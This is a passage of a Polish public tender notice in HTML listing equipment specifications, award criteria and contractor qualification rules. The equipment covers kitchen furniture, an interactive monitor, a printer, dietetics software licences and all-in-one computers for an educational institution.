przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100punktowej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W niniejszym opisie przedmiotu zamówienia przedstawiono minimalne wymagania dotyczące wyposażenia, które muszą być spełnione. Wykonawcy mogą przedstawić oferty równoważne, jednakże proponowany przez wykonawcę sprzęt równoważny musi charakteryzować się takimi samymi parametrami funkcjonalno-użytkowymi jak produkty opisane poniżej lub je przewyższać. Proponowany sprzęt musi spełniać wymagane parametry wymiarowe i techniczne podane w opisie poszczególnych pozycji sprzętu poniżej. Jakiekolwiek wskazane w opisie przedmiotu zamówienia, nazwy produktów lub ich producenci mają na celu jedynie przybliżenie wymagań, których nie można było opisać przy pomocy dostatecznie dokładnych i zrozumiałych określeń. W przypadku zastosowania produktów równoważnych, Wykonawca zobowiązany jest do przedstawienia szczegółowej dokumentacji technicznej potwierdzającej zgodność z wymaganiami.<br/>Wymagania dotyczące przedmiotu zamówienia<br/>1.	Oferowany produkt nie może być prototypem musi być produktem istniejącym na rynku w obrocie.<br/>2.	Wymagane wraz z ofertą podanie modelu oraz producenta oferowanego produktu.<br/>3.	Koszt dostawy, rozładunku i montażu pokrywa Wykonawca.<br/>4.	Dostarczone urządzenia muszą być wyposażone w następujące dokumenty:<br/>a)	Deklarację zgodności producenta CE,<br/>b)	Dokument gwarancyjny,<br/>c)	Instrukcję obsługi w języku polskim,<br/>d)	Atest PZH lub deklarację zgodności higienicznej z dopuszczeniem do zastosowań w gastronomii,<br/>e)	Wymagany jest montaż i szkolenie z obsługi przez autoryzowany serwis techniczny – jako załącznik do oferty należy przedstawić certyfikaty autoryzacji producentów oferowanych urządzeń.<br/><br/>1.	Zabudowa meblowa – 1 zestaw zgodnie z poniższą specyfikacją:<br/>a)	Zestaw mebli kuchennych zgodnie z przedstawioną poniżej wizualizacją:<br/>i.	Korpusy szafek wykonane z płyty meblowej drewnopodobnej (kolor do uzgodnienia)<br/>i.	Blaty kuchenne gr. 38 mm okleina gr. Min. 0,8 mm<br/>ii.	Zawiasy FGV cichy domyk<br/>iii.	Prowadnice do szuflad Comfort Box<br/>iv.	Uchwyty (rodzaj do ustalenia z Zamawiającym)<br/>v.	Szafki dolne na nogach wysokości 10 cm zasłonięte cokołem<br/>vi.	Wymiary poszczególnych elementów:<br/>Szafki dolne:<br/>Z szufladami: 60x57x86 – 1 szt.<br/>Z szufladami: 80x57x86 – 1 szt.<br/>Narożna:95x65x86 – 1 szt.<br/>Z drzwiami 100x57x86 – 1 szt.<br/>Z szufladami: 90x57x86 – 2 szt.<br/>Z drzwiami: 70x32x86 – 1 szt.<br/>Z drzwiami: 40x32x86 1 szt.<br/><br/>Szafki górne:<br/>88x34x94 – 2 szt.<br/>narożna 60x60x94 – 1 szt.<br/>80x34x94 – 3 szt. <br/>60x34x94 – 1 szt.<br/><br/>Szafka pod zlewozmywak:<br/>80x57x86 – 1 szt.<br/>Szafa gospodarcza:<br/>120x57x240- 1 szt. <br/>b)	Stół – 1 szt.:<br/>i.	Blat kuchenny gr. 38 mm okleina gr. 2 mm<br/>ii.	Nogi aluminiowe malowane proszkowo<br/>iii.	Ostateczne wymiary do ustalenia z Zamawiającym, przybliżony wymiar: 180x90x75 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39141000-2 - Meble i wyposażenie kuchni</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39141300-5 - Szafy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100punktowej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W niniejszym opisie przedmiotu zamówienia przedstawiono minimalne wymagania dotyczące wyposażenia, które muszą być spełnione. Wykonawcy mogą przedstawić oferty równoważne, jednakże proponowany przez wykonawcę sprzęt równoważny musi charakteryzować się takimi samymi parametrami funkcjonalno-użytkowymi jak produkty opisane poniżej lub je przewyższać. Proponowany sprzęt musi spełniać wymagane parametry wymiarowe i techniczne podane w opisie poszczególnych pozycji sprzętu poniżej. Jakiekolwiek wskazane w opisie przedmiotu zamówienia, nazwy produktów lub ich producenci mają na celu jedynie przybliżenie wymagań, których nie można było opisać przy pomocy dostatecznie dokładnych i zrozumiałych określeń. Zamawiający dopuszcza tolerancje wymiarów i parametrów w zakresie +/- 5% stałych, konkretnie wskazanych parametrów, które nie zawierają określeń typu: minimum, maksimum, nie więcej niż, nie mniej niż, maksymalnie, minimalnie, chyba, że w treści opisu danej pozycji przedmiotu zamówienia, podany jest inny dopuszczalny zakres tolerancji. W przypadku zastosowania produktów równoważnych, Wykonawca zobowiązany jest do przedstawienia szczegółowej dokumentacji technicznej potwierdzającej zgodność z wymaganiami.<br/>Wymagania dotyczące przedmiotu zamówienia<br/>1.	Oferowany produkt nie może być prototypem musi być produktem istniejącym na rynku w obrocie.<br/>2.	Wymagane wraz z ofertą podanie modelu oraz producenta oferowanego produktu.<br/>3.	Koszt dostawy, rozładunku i montażu pokrywa Wykonawca.<br/>4.	Klasa energetyczna sprzętu minimum C.<br/>5.	Dostarczone urządzenia muszą być wyposażone w następujące dokumenty:<br/>a)	Deklarację zgodności producenta CE,<br/>b)	Dokument gwarancyjny,<br/>c)	Instrukcję obsługi w języku polskim.<br/><br/>I.	Monitor interaktywny o dużej przekątnej ekranu przeznaczony do użytku edukacyjnego i prezentacyjnego – 1 szt.<br/>1.	Przekątna ekranu: 85 cali lub większa.<br/>2.	Typ ekranu: VA (Vertical Alignment) lub równoważna technologia zapewniająca szerokie kąty widzenia i wysoki kontrast.<br/>3.	Rozdzielczość: 4K (3840 x 2160 pikseli) lub wyższa, umożliwiająca wyświetlanie treści w wysokiej jakości.<br/>4.	Technologia dotyku: Możliwość obsługi wielodotykowej z co najmniej 20 punktami dotyku, technologia podczerwieni lub równoważna, zapewniająca możliwość obsługi wielodotykowej z co najmniej 20 punktami dotyku.<br/>5.	Funkcje interaktywne:<br/>o	Możliwość rysowania, pisania i interakcji z treścią na ekranie w czasie rzeczywistym.<br/>o	Współpraca z wieloma użytkownikami jednocześnie.<br/>6.	Łączność:<br/>o	Wi-Fi: Bezprzewodowe połączenie z siecią.<br/>o	Bluetooth: Obsługa urządzeń zewnętrznych (np. bezprzewodowe klawiatury, myszy, głośniki).<br/>o	Porty HDMI, USB, LAN (Ethernet): Co najmniej dwa porty HDMI, co najmniej trzy porty USB (w tym 1x USB 3.0), porty Ethernet do stabilnego połączenia przewodowego.<br/>7.	Porty audio: Wyjścia audio (jack, HDMI) do podłączenia zewnętrznych urządzeń audio.<br/>8.	System operacyjny: Zintegrowany system operacyjny umożliwiający instalację aplikacji edukacyjnych i multimedialnych, typu Android lub równoważny system.<br/>9.	Wbudowane funkcje multimedialne:<br/>o	Obsługa odtwarzania treści wideo i audio w jakości 4K.<br/>o	Wbudowane głośniki o mocy co najmniej 2 x 10 W.<br/>10.	Zasilanie: Niskie zużycie energii, urządzenie zgodne z normami energooszczędności (np. Energy Star lub równoważnymi).<br/>11.	Powierzchnia ekranu:<br/>o	Wysoka odporność na zarysowania (powłoka hartowana 7H lub równoważna o wysokiej odporności na zarysowania).<br/>o	Powłoka matowa lub antyrefleksyjna, zapobiegająca odblaskom w silnym oświetleniu.<br/>12.	Wymiary urządzenia: Zgodne z wymaganiami dla przestrzeni edukacyjnych, odpowiednie do montażu na ścianie lub ustawienia na podstawie.<br/>13.	Wsparcie techniczne: Dostępność wsparcia w języku polskim oraz możliwość serwisowania na miejscu.<br/>14.	Monitor na wysuwanym ramieniu.<br/>15.	Certyfikaty i normy:<br/>o	Certyfikat CE lub równoważny<br/>o	Zgodność z normami RoHS lub równoważne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">32322000-6 - Urządzenia multimedialne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39162110-9 - Sprzęt dydaktyczny</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100punktowej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W niniejszym opisie przedmiotu zamówienia przedstawiono minimalne wymagania dotyczące wyposażenia, które muszą być spełnione. Wykonawcy mogą przedstawić oferty równoważne, jednakże proponowany przez wykonawcę sprzęt równoważny musi charakteryzować się takimi samymi parametrami funkcjonalno-użytkowymi jak produkty opisane poniżej lub je przewyższać. Proponowany sprzęt musi spełniać wymagane parametry wymiarowe i techniczne podane w opisie poszczególnych pozycji sprzętu poniżej. Jakiekolwiek wskazane w opisie przedmiotu zamówienia, nazwy produktów lub ich producenci mają na celu jedynie przybliżenie wymagań, których nie można było opisać przy pomocy dostatecznie dokładnych i zrozumiałych określeń. Zamawiający dopuszcza tolerancje wymiarów i parametrów w zakresie +/- 5% stałych, konkretnie wskazanych parametrów, które nie zawierają określeń typu: minimum, maksimum, nie więcej niż, nie mniej niż, maksymalnie, minimalnie, chyba, że w treści opisu danej pozycji przedmiotu zamówienia, podany jest inny dopuszczalny zakres tolerancji. W przypadku zastosowania produktów równoważnych, Wykonawca zobowiązany jest do przedstawienia szczegółowj dokumentacji technicznej potwierdzającej zgodność z wymaganiami.<br/>Wymagania dotyczące przedmiotu zamówienia<br/>1.	Oferowany produkt nie może być prototypem musi być produktem istniejącym na rynku w obrocie.<br/>2.	Wymagane wraz z ofertą podanie modelu oraz producenta oferowanego produktu.<br/>3.	Koszt dostawy, rozładunku i montażu pokrywa Wykonawca.<br/>5.	Dostarczone urządzenia muszą być wyposażone w następujące dokumenty:<br/>a) Deklarację zgodności producenta CE,<br/>b) Dokument gwarancyjny,<br/>c) Instrukcję obsługi w języku polskim.<br/>Urządzenie wielofunkcyjne A4 (drukarka, skaner) laserowa – 1 sztuka<br/>1.	format A4<br/>2.	standardowe rozwiązania komunikacyjne: Ethernet, USB, WiFi, Wi-Fi Direct<br/>3.	drukowanie z urządzeń mobilnych<br/>4.	Szybkość drukowania: &#34;Minimum 25 stron A4/min w trybie mono/kolor.&#34;<br/>5.	Maksymalna gramatura nośników 220 g/m² (do 250 g/m² w przypadku specjalnych mediów, takich jak papier fotograficzny czy karton).<br/>6.	Rozdzielczość druku: Minimum 600 x 600 dpi (tryb wysokiej jakości do 1200 x 600 dpi).<br/>7.	Automatyczny druk dwustronny. <br/>8.	Optyczna rozdzielność skanowania 600x600 dpi 24 bit<br/>9.	Formaty skanowania: TIFF, JPEG, PDF, możliwość zapisu w innych popularnych formatach (np. PNG, XPS).&#34;<br/>10.	Skanowanie dwustronne.<br/>11.	Komplet dodatkowych zapasowych tonerów CMYK. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30121200-5 - Urządzenia fotokopiujące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100punktowej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Wymagania dotyczące licencji na program dietetyczny na 21 szt. Komputerów:<br/>Funkcjonalność oprogramowania dietetycznego:<br/>1.	Obszerna i aktualna baza produktów spożywczych – baza powinna zawierać wartości odżywcze produktów oraz możliwość regularnych aktualizacji<br/>2.	Generowanie raportów i analiz – możliwość tworzenia zestawień dotyczących składu posiłków, dziennego zapotrzebowania na składniki odżywcze, historii diet pacjentów<br/>3.	Automatyczne układanie jadłospisów – funkcja pozwalająca na szybkie generowanie planów żywieniowych zgodnie z zaleceniami dietetycznymi i preferencjami użytkownika<br/>4.	Prowadzenie dokumentacji pacjentów – system umożliwiający gromadzenie i przechowywanie danych pacjentów, ich preferencji dietetycznych, postępów i zaleceń<br/>5.	Dostęp mobilny – możliwość korzystania z oprogramowania na urządzeniach mobilnych (smartfony, tablety) w formie aplikacji lub responsywnej wersji online<br/>6.	Możliwość integracji z urządzeniami pomiarowymi – np. waga, analiza składu ciała<br/>7.	Intuicyjny interfejs użytkownika, łatwy w obsłudze<br/>8.	Możliwość importowania i eksportowania danych<br/>9.	Dostęp do aktualizacji bazy produktów i wartości odżywczych<br/>10.	Obsługa online oraz lokalna<br/>Dodatkowe wymagania:<br/>1.	Licencja na min. 12 miesięcy<br/>2.	Pełna dokumentacja użytkownika w języku polskim<br/>3.	Wsparcie techniczne i aktualizacje w okresie gwarancyjnym </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48190000-6 - Pakiety oprogramowania edukacyjnego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100 punktowej</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres licencji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> W niniejszym opisie przedmiotu zamówienia przedstawiono minimalne wymagania dotyczące wyposażenia, które muszą być spełnione. Wykonawcy mogą przedstawić oferty równoważne, jednakże proponowany przez wykonawcę sprzęt równoważny musi charakteryzować się takimi samymi parametrami funkcjonalno-użytkowymi jak produkty opisane poniżej lub je przewyższać. Proponowany sprzęt musi spełniać wymagane parametry wymiarowe i techniczne podane w opisie poszczególnych pozycji sprzętu poniżej. Jakiekolwiek wskazane w opisie przedmiotu zamówienia, nazwy produktów lub ich producenci mają na celu jedynie przybliżenie wymagań, których nie można było opisać przy pomocy dostatecznie dokładnych i zrozumiałych określeń. Zamawiający dopuszcza tolerancje wymiarów i parametrów w zakresie +/- 5% stałych, konkretnie wskazanych parametrów, które nie zawierają określeń typu: minimum, maksimum, nie więcej niż, nie mniej niż, maksymalnie, minimalnie, chyba, że w treści opisu danej pozycji przedmiotu zamówienia, podany jest inny dopuszczalny zakres tolerancji. W przypadku zastosowania produktów równoważnych, Wykonawca zobowiązany jest do przedstawienia szczegółowej dokumentacji technicznej potwierdzającej zgodność z wymaganiami.<br/><br/>Wymagania dotyczące przedmiotu zamówienia<br/>1.	Oferowany produkt nie może być prototypem musi być produktem istniejącym na rynku w obrocie.<br/>2.	Wymagane wraz z ofertą podanie modelu oraz producenta oferowanego produktu.<br/>3.	Koszt dostawy, rozładunku i montażu pokrywa Wykonawca.<br/>5.	Dostarczone urządzenia muszą być wyposażone w następujące dokumenty:<br/>a)	Deklarację zgodności producenta CE,<br/>b)	Dokument gwarancyjny,<br/>c)	Instrukcję obsługi w języku polskim.<br/><br/>ZESTAWY KOMPUTEROWE – All In One – 20 szt. <br/>1.	Typ produktu - All-in-One PC<br/>2.	Procesor:<br/>Procesor klasy ARM osiągający minimalną wydajność x86/x64 i uzyskujący minimalnie 42,038 pkt. w testach PassMark CPU Mark wg wyników opublikowanych na stronie https://www.cpubenchmark.net. <br/>Na potwierdzenie osiągnięcia, wymaganej przez Zamawiającego wydajności procesora, Wykonawca zobowiązany jest złożyć wraz z ofertą wydruk strony benchmarków. Wydruk taki musi zawierać dane umożliwiające identyfikację strony internetowej, z której dokonano wydruku, oraz datę wydruku (osiągnięcia określonego wyniku<br/>3.	Wbudowana karta graficzna:<br/>4.	Płyta Główna:<br/>a)	Płyta główna musi być wyposażona w chipset zapewniający wysoką wydajność i obsługujący nowoczesne technologie, takie jak obsługa pamięci DDR4/DDR5 oraz PCIe 4.0. Chipset powinien być zgodny z procesorami wymagającymi tej klasy płyty.<br/>b)	Wbudowana karta dźwiękowa <br/>c)	Wbudowana karta sieciowa obsługująca przynajmniej standard 10/100/1000 Mbps (Gigabit Ethernet) lub wyższe standardy, np. 2500 Mbps, zapewniająca szybki i stabilny dostęp do sieci.<br/>d)	Co najmniej 4 gniazda SATA III (6 Gb/s) do podłączenia dysków twardych oraz napędów SSD.<br/>e)	Co najmniej 4 gniazda M.2 PCIe (lub równoważne) do podłączenia napędów SSD, zapewniające szybki transfer danych.<br/>5.	Pamięć operacyjna (RAM):<br/>a)	Minimum: 16 GB, <br/>b)	Taktowanie minimum 5600 MHz, <br/>c)	Dopuszczalne równoważne moduły kompatybilne z wymaganą architekturą.<br/>d)	Minimum 4 gniazda (co najmniej 2 wolne).<br/>e)	Typ pamięci RAM - DDR5 lub równoważny<br/>6.	Dysk SSD:<br/>a)	Całkowita pojemność dysku 512 GB<br/>b)	Interfejs pamięci SSD - PCI Express 4.0<br/>c)	NVMe<br/>d)	Typ dysku SSD - M.2<br/>7.	Monitor:<br/>a)	Przekątna ekranu - 23,8&#34;<br/>b)	Rozdzielczość - 1920 x 1080 px<br/>c)	Full HD<br/>d)	Jasność - 250 cd/m²<br/>e)	Typ matrycy - IPS<br/>f)	Współczynnik kontrastu (typowy) - 1300:1<br/>g)	Maksymalna częstotliwość odświeżania - 100 Hz<br/>h)	Przestrzeń barw RGB - sRGB<br/>i)	Ekran matowy<br/>j)	Regulacja pochylenia<br/>k)	Zakres kąta nachylenia	-5 - 15°<br/>8.	Kamera<br/>a)	Wbudowana kamera/aparat<br/>b)	Suma megapikseli - 5 MP<br/>9.	Sieć<br/>a)	Wi-Fi 6 (802.11ax)<br/>10.	Porty i Interfejsy<br/>a)	Ilość portów Ethernet LAN (RJ-45) – 1<br/>b)	Liczba portów USB 2.0 - 2<br/>c)	Ilość portów USB 3.2 Gen 2 (3.1 Gen 2) Typu-A	- 1<br/>d)	Ilość portów USB 3.2 Gen 2 (3.1 Gen 2) Typu-C - 1<br/>e)	Ilość portów HDMI - 2<br/>f)	Wersja HDMI	1.4/2.1<br/>g)	Port dla zestaw słuchawka/mikrofon<br/>11.	System operacyjny/oprogramowanie dodatkowe:<br/>a)	System operacyjny zapewniający pełną kompatybilność z wymaganym oprogramowaniem i funkcjonalnościami oraz spełniający wymogi Systemu Windows 11<br/>b)	Oprogramowanie biurowe z funkcjonalnościami Office.<br/>12.	Gwarancja i serwis<br/>a)	Gwarancja: Minimum 24 miesięcy na wszystkie komponenty.<br/>b)	Serwis: Czas reakcji serwisowej nie dłuższy niż 2 dni robocze, naprawa w terminie do 14 dni od zgłoszenia.<br/>13.	Akcesoria<br/>a)	Klawiatura i mysz w zestawie, słuchawki z mikrofonem kompatybilne z wymaganym systemem operacyjnym.<br/>b)	Napęd DVD RW<br/>c)	instrukcja obsługi w języku polskim<br/>d)	kabel Display Port, <br/>e)	kabel USB, <br/>f)	kabel USB-C, .<br/>g)	kabel zasilający<br/><br/>14.	W ramach realizacji zamówienia wykonawca zapewni pełne podłączenie komputerów do sieci energetycznej w salach oraz do sieci internetowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213300-8 - Komputer biurkowy</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane przez komisję przetargową metodą punktową w skali 100punktowej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	Wykonawcą może być osoba fizyczna, osoba prawna albo jednostka organizacyjna nieposiadająca osobowości prawnej. <br/>2)	Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie przez Wykonawców, o których mowa w art. 94 ustawy Pzp, tj. mających status zakładu pracy chronionej, spółdzielnie socjalne oraz innych Wykonawców, których głównym celem lub głównym celem działalności ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, jest społeczna i zawodowa integracja osób społecznie marginalizowanych.<br/>3)	Zamówienie może zostać udzielone Wykonawcy, który: <br/>–	nie podlega wykluczeniu z postępowania z powodu jednej z okoliczności wskazanych w art. 108 ust. 1 ustawy Pzp, które wystąpiły w odpowiednim okresie określonym w art. 111uPZP, <br/>–	nie podlega wykluczeniu z postępowania z powodu jednej z okoliczności wskazanych w art. 7 ust 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. 2024 